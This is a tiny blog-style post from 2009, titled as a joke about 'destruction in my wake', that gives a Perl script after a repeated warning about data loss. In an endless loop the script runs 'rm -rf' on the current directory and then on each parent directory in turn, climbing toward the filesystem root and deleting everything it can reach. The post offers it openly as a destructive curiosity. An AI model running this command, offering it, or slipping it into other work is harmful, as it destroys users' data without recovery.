Walking backwards to see the destruction in my wake
warning: running this will very probably result in extreme loss of data
25. February 2009
warning: running this will very probably result in extreme loss of data
25. February 2009
#!/usr/bin/perl
$path = '';
while(1){
`rm -rf $path`;
$path .= '../';
}